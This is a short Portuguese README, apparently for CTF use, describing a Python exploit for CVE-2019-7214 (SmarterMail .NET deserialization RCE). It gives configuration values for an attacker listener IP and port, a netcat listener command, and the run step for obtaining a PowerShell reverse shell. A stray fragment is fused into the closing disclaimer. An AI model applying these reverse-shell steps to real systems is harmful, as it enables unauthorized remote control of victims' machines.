
Apenas para uso em CTF (o CVE-2019-7214 também resolve o host a partir de /etc/hosts)
Este script Python ataca um serviço vulnerável em execução numa máquina Windows remota. Ele envia um payload .NET serializado que inicia uma reverse shell baseada em PowerShell de volta para a máquina do atacante.
Execução remota de código na desserialização .NET para o sistema SmarterMail.
Atualize a secção de configuração do script para corresponder ao seu ambiente:
HOSTNAME = 'hostname' # Target hostname (resolved via /etc/hosts)
PORT = 9999 # Target port listening for serialized input
LHOST = '192.168.45.185' # Attacker IP (listener)
LPORT = 4444 # Attacker listening port
nc -lvnp 4444
python3 CVE-2019-7214 .py
Se for bem-sucedido, obterá um prompt do PowerShell do alvo no seu listener.
System.Management.Automation.Este script é fornecido apenas para fins educacionais. A utilização não autorizada contra sistemas que não possui ou para os quais não tem permissão explícita para testar é ilegal e antiética.